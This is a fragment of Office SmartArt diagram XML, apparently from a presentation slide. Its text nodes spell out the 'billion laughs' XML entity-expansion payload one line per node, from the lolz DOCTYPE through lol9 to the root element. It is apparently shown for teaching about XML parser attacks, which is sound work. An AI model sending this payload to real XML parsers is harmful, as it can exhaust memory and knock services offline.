    <dgm:cxn modelId="{B6EBABA8-DB21-4501-ABA6-CB810758E710}" srcId="{CC1E3A08-F2A2-4B19-B362-921604A58920}" destId="{93892046-3666-40DA-A25F-F5A80EA97143}" srcOrd="2" destOrd="0" parTransId="{1F6887AA-3F06-4F81-8C62-E38DC2954FB9}" sibTransId="{84A6369C-5CDA-42DE-AE5E-38C8FC4A9F55}"/>
    <dgm:cxn modelId="{EC47B4B7-C22E-4221-918A-8D6EC6FDC25D}" srcId="{CC1E3A08-F2A2-4B19-B362-921604A58920}" destId="{2869F77C-428C-4476-B991-29D723BA7534}" srcOrd="1" destOrd="0" parTransId="{25C117E5-7C10-41E2-BB1F-38C29180B88A}" sibTransId="{E5D69793-9841-4B31-9990-E7F8D371BA07}"/>
    <dgm:cxn modelId="{A3F42FD0-63C0-4D88-827B-E437BD19F717}" type="presOf" srcId="{11075852-259D-4B9A-911B-ED61F04708D2}" destId="{2C595CEF-D83A-4A2A-92A4-82F4AA3712F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{2DC46BFD-2920-4B9C-9C29-3ADA487768D5}" srcId="{CC1E3A08-F2A2-4B19-B362-921604A58920}" destId="{178CAA62-FD52-48CD-8008-51024AEA409C}" srcOrd="3" destOrd="0" parTransId="{538C392D-0B15-4D6C-9628-7F287E9B6BCB}" sibTransId="{F1931B97-5A31-4BDE-9326-F1304E751537}"/>
    <dgm:cxn modelId="{AA3EFE59-D322-427A-B9A1-564B75386E28}" type="presParOf" srcId="{04DBE115-D67C-40B4-9E63-93B43490B332}" destId="{95511A81-CDF3-4981-852C-B8CC6545F5DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{81CB5785-213D-4B1E-975E-7EA452784C98}" type="presParOf" srcId="{95511A81-CDF3-4981-852C-B8CC6545F5DB}" destId="{91F0BD34-F067-41F5-BC50-F0A4B3271D11}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{6EB91C41-1CEF-419E-994C-98DBCE65647C}" type="presParOf" srcId="{91F0BD34-F067-41F5-BC50-F0A4B3271D11}" destId="{1A520F58-BDB2-460D-A6F9-E93D7041A391}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{53B8FE5B-BA4E-4A15-8132-6E1C1AE9F0C5}" type="presParOf" srcId="{91F0BD34-F067-41F5-BC50-F0A4B3271D11}" destId="{56B9B7CC-C1E7-4187-8D17-F2BB0E1C5665}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{4327E3D6-E73E-4F6E-9693-5BDDFB4B87ED}" type="presParOf" srcId="{91F0BD34-F067-41F5-BC50-F0A4B3271D11}" destId="{AA2278DD-DD39-4849-B1F3-B47973A6DE72}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{E67D39FB-58EF-4E79-97AF-40A8088F5298}" type="presParOf" srcId="{91F0BD34-F067-41F5-BC50-F0A4B3271D11}" destId="{7B42DF27-280B-447C-B43C-5AFC1C189908}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{45716FF8-B49E-47FE-B543-BB5AEF8ECDF4}" type="presParOf" srcId="{95511A81-CDF3-4981-852C-B8CC6545F5DB}" destId="{2C595CEF-D83A-4A2A-92A4-82F4AA3712F4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{0D0B3F0E-E7E8-4B1E-82DA-CFC948BACF91}" type="presParOf" srcId="{95511A81-CDF3-4981-852C-B8CC6545F5DB}" destId="{2CB7E81F-41AC-4607-A984-8AB1D2A52113}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{3E0F8C83-01F1-4CE6-A7D5-568D69270D55}" type="presParOf" srcId="{2CB7E81F-41AC-4607-A984-8AB1D2A52113}" destId="{B5F164E8-A3ED-40AD-B4CB-492FBBE28CDD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{06D35EE3-977E-4F62-9DC5-91BE98FF6514}" type="presParOf" srcId="{2CB7E81F-41AC-4607-A984-8AB1D2A52113}" destId="{092E29F1-4FB5-47FD-8FB1-AA94CDF9343C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{9388170A-4B75-40ED-8A31-AC3D057E0307}" type="presParOf" srcId="{2CB7E81F-41AC-4607-A984-8AB1D2A52113}" destId="{4942B489-5621-420D-801C-E2801787FEBF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{4CB9D9A9-E70B-4C71-8326-7EE0D29A6912}" type="presParOf" srcId="{2CB7E81F-41AC-4607-A984-8AB1D2A52113}" destId="{4E7121B5-E309-4FC5-A1E6-E12DBAC6E20E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{3DB75A7D-34DD-47AE-ADF1-DF747F0E572E}" type="presParOf" srcId="{95511A81-CDF3-4981-852C-B8CC6545F5DB}" destId="{5CD22E0E-E0E4-4081-94AC-F66715083E91}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{879A06C1-AC30-4ABA-B1DA-D3797C69B6FB}" type="presParOf" srcId="{95511A81-CDF3-4981-852C-B8CC6545F5DB}" destId="{04536504-2189-4D93-9C4F-516D22E39A57}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{1F0DE171-F606-4967-ADC6-F1B850093286}" type="presParOf" srcId="{04536504-2189-4D93-9C4F-516D22E39A57}" destId="{A0B888F6-5ADE-4950-AB0B-4F8213ABCE78}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{96DD08B0-BF8A-416D-824E-91A8A5EED1AD}" type="presParOf" srcId="{04536504-2189-4D93-9C4F-516D22E39A57}" destId="{848BB5F4-68C5-4426-931D-E08A337612CB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{3A941043-DED4-4C92-B675-30DF57B0507B}" type="presParOf" srcId="{04536504-2189-4D93-9C4F-516D22E39A57}" destId="{3AD19034-94C9-4D0B-B043-A64E7CD6BA87}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{C64AB387-A2EB-4FE8-B344-1C3AE661BCE6}" type="presParOf" srcId="{04536504-2189-4D93-9C4F-516D22E39A57}" destId="{17B7B7B2-BD78-49C5-8A7B-92353BCA8FF9}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{1F97342C-6FA8-4172-8712-6197EE406910}" type="presParOf" srcId="{95511A81-CDF3-4981-852C-B8CC6545F5DB}" destId="{A0046A77-E0AC-46D8-8953-4C9275ABDFBB}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{3805CCED-CCE6-4D2F-AE6D-DDEEB643986E}" type="presParOf" srcId="{95511A81-CDF3-4981-852C-B8CC6545F5DB}" destId="{321B01E6-F036-4714-9A51-0C260B732A55}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{45DDE0E4-DB80-4CF5-A316-452B60DC06EA}" type="presParOf" srcId="{321B01E6-F036-4714-9A51-0C260B732A55}" destId="{3E76CF09-612A-439D-A40A-834D62BC5737}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{3BCDBC42-9010-4D32-8A53-43C1236BB9C1}" type="presParOf" srcId="{321B01E6-F036-4714-9A51-0C260B732A55}" destId="{E7710A28-0DDB-4774-BCD6-68474ABDE7E5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{68985FD1-E847-4D92-B75B-D50D9B486264}" type="presParOf" srcId="{321B01E6-F036-4714-9A51-0C260B732A55}" destId="{B520385A-5B00-4D0F-B16D-FF7C810A9813}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{2F68296E-E15F-46EC-B230-8020DE8032C7}" type="presParOf" srcId="{321B01E6-F036-4714-9A51-0C260B732A55}" destId="{12AD53CD-B2B1-47E8-BD3B-884110030A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CF5FF8-DFFD-42DF-A47E-2EADC20D07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FAFD2D-1B70-44D0-8F84-3CA3DF10B623}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>&lt;!DOCTYPE lolz [</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7ADF0E4A-33CD-4466-8B39-BDF6E3A0AB47}" type="parTrans" cxnId="{593B9AD4-7ABA-4C6C-AA6E-A0C1592D7FA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65F11CE4-95D7-49A6-884F-2FE75F367A7C}" type="sibTrans" cxnId="{593B9AD4-7ABA-4C6C-AA6E-A0C1592D7FA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88041A27-A768-449F-82E5-DF83E9236115}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>&lt;!ENTITY lol "lol"&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F10D50C8-C664-4A7B-86DB-1A7978417D66}" type="parTrans" cxnId="{20867B70-4E16-49B0-BD59-4CB391E86D34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F933BE0-FD80-45D5-9E5F-2369D56F9422}" type="sibTrans" cxnId="{20867B70-4E16-49B0-BD59-4CB391E86D34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EA8A2DE2-6AAC-4651-9898-E35C8165AF8D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>&lt;!ELEMENT lolz (#PCDATA)&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8B3E400E-ABAD-441A-ACFB-EC8708B3A00E}" type="parTrans" cxnId="{BB04105D-ADA9-49BE-A5E7-5583F4B5B0F2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C6AB923-85B5-4330-BFDC-BA1C7AB96EBF}" type="sibTrans" cxnId="{BB04105D-ADA9-49BE-A5E7-5583F4B5B0F2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B83DE22A-049F-41DA-A290-0684667122BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>&lt;!ENTITY lol1 "&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;"&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4B47FBF-0FE7-467F-9951-7FF10BAC188C}" type="parTrans" cxnId="{7A56889C-D5DD-49E3-B8A5-347B8523B6E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C40E410-BB9D-42F9-81C2-7043F634F2AB}" type="sibTrans" cxnId="{7A56889C-D5DD-49E3-B8A5-347B8523B6E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6100E07D-A88B-4AD4-89AB-DFC1F2D08775}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>&lt;!ENTITY lol2 "&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;"&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8117E53A-76D5-47BF-BADD-AC91CB790187}" type="parTrans" cxnId="{7FAE471C-DD6B-4380-8696-E52DF65AA35E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3853CC9B-D62F-41F4-AB0B-E38CC91FA347}" type="sibTrans" cxnId="{7FAE471C-DD6B-4380-8696-E52DF65AA35E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2B4B0C1-E85C-4CC9-A6DA-154EB9A2BF3D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>&lt;!ENTITY lol3 "&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;"&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{172857FF-005C-4F4C-9708-C1AAEFCFB317}" type="parTrans" cxnId="{540A7A01-44F0-449B-BE04-59D8F32783EF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8A259D7-8681-457D-A605-D7EEF54C8BAB}" type="sibTrans" cxnId="{540A7A01-44F0-449B-BE04-59D8F32783EF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3A7FFF7E-673F-4033-BD86-72C54EDC3C59}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>&lt;!ENTITY lol4 "&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;"&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88B38B20-F3F6-4E1E-A043-A76093810DAC}" type="parTrans" cxnId="{C6203C47-7D24-4D15-A50A-84A865ECB471}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37B42EB0-4F26-422B-A01C-4772EE1242BC}" type="sibTrans" cxnId="{C6203C47-7D24-4D15-A50A-84A865ECB471}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20021B31-B750-4F14-9A6D-8F6F948B1449}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>&lt;!ENTITY lol5 "&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;"&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDB67753-FE14-4C41-A974-118AFAE82D70}" type="parTrans" cxnId="{51B161EE-9BCF-451B-9C35-E259631AF2DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6B79FD01-24D5-4C53-9B7E-AD4EF768DC97}" type="sibTrans" cxnId="{51B161EE-9BCF-451B-9C35-E259631AF2DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9420C192-0B0F-4B30-A707-4575EE6C3461}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>&lt;!ENTITY lol6 "&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;"&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7D8D1313-97D3-4261-8372-5A23E243F1E5}" type="parTrans" cxnId="{9D6C2591-9DC6-47AE-9FDE-BF03118A8B91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6569BA5E-7B24-458F-9464-95101DC7094D}" type="sibTrans" cxnId="{9D6C2591-9DC6-47AE-9FDE-BF03118A8B91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{209A3476-BDE4-42B1-9B8C-BEF2EAD9C806}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>&lt;!ENTITY lol7 "&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;"&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ADD7C24A-6C3C-4D8D-A06B-45735DFD793D}" type="parTrans" cxnId="{E6C7F98A-2D32-40B7-9A34-4BB3AEF2DB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{408E1BDF-5909-466F-94D5-FED9536C64A2}" type="sibTrans" cxnId="{E6C7F98A-2D32-40B7-9A34-4BB3AEF2DB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91BA1D6A-4D34-435B-BDBB-55C6447B22A9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>&lt;!ENTITY lol8 "&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;"&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F8A76278-C00E-410A-AAB9-ED04A9F32E49}" type="parTrans" cxnId="{9E9A0226-5497-484B-BF66-505ADF68547D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60917754-172B-44DE-93EE-4A2E7CB36DE8}" type="sibTrans" cxnId="{9E9A0226-5497-484B-BF66-505ADF68547D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA8E420A-E77F-43FC-A504-0798D923B95E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>&lt;!ENTITY lol9 "&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;"&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3395043-78FF-4557-BCE0-6802FE7F7BB5}" type="parTrans" cxnId="{2FC39D0E-D131-4F64-8AB9-02F90FAFE10D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CE532524-E04D-4003-891E-EC96E56F12B7}" type="sibTrans" cxnId="{2FC39D0E-D131-4F64-8AB9-02F90FAFE10D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E7B693E-3A69-4EDC-88DF-9CEEE3343F23}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>]&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F14FA30A-81CB-4BC2-BC7D-CC744CF53D71}" type="parTrans" cxnId="{3DCC02FD-2BE3-44A6-883F-B07508F940D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FFCDFCD-445E-4531-B074-87CFE6CC463D}" type="sibTrans" cxnId="{3DCC02FD-2BE3-44A6-883F-B07508F940D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9CBC834-38A6-4F1E-9094-57316AC424FA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>&lt;lolz&gt;&amp;lol9;&lt;/lolz&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9ED489D2-92C6-4BB4-86CF-41EF3E08B7A0}" type="parTrans" cxnId="{68E2281F-AC0E-4217-BF53-A7A960C6BBC1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E485BAF-BE85-4B61-8525-7FB721BBDCC2}" type="sibTrans" cxnId="{68E2281F-AC0E-4217-BF53-A7A960C6BBC1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B8503A4D-CF5A-4B1D-8EF9-6E7662DF5222}" type="pres">
      <dgm:prSet presAssocID="{C2CF5FF8-DFFD-42DF-A47E-2EADC20D07E1}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D3A79C6F-27DA-4625-8846-055059BF3C99}" type="pres">
      <dgm:prSet presAssocID="{ABFAFD2D-1B70-44D0-8F84-3CA3DF10B623}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="14">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1B296A5D-286E-4402-9F08-5169FFD507A9}" type="pres">
      <dgm:prSet presAssocID="{65F11CE4-95D7-49A6-884F-2FE75F367A7C}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{15DA23EA-70AF-458E-AAFA-BDDA9F953408}" type="pres">
      <dgm:prSet presAssocID="{88041A27-A768-449F-82E5-DF83E9236115}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="14">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D309830E-F184-4C34-884A-C9DD86DA17BB}" type="pres">
      <dgm:prSet presAssocID="{9F933BE0-FD80-45D5-9E5F-2369D56F9422}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9DAF7B49-D717-42B7-B209-37DAE2425516}" type="pres">
      <dgm:prSet presAssocID="{EA8A2DE2-6AAC-4651-9898-E35C8165AF8D}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="14">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D420BA1A-2F12-47B5-B9F9-88E21F27A863}" type="pres">
      <dgm:prSet presAssocID="{2C6AB923-85B5-4330-BFDC-BA1C7AB96EBF}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
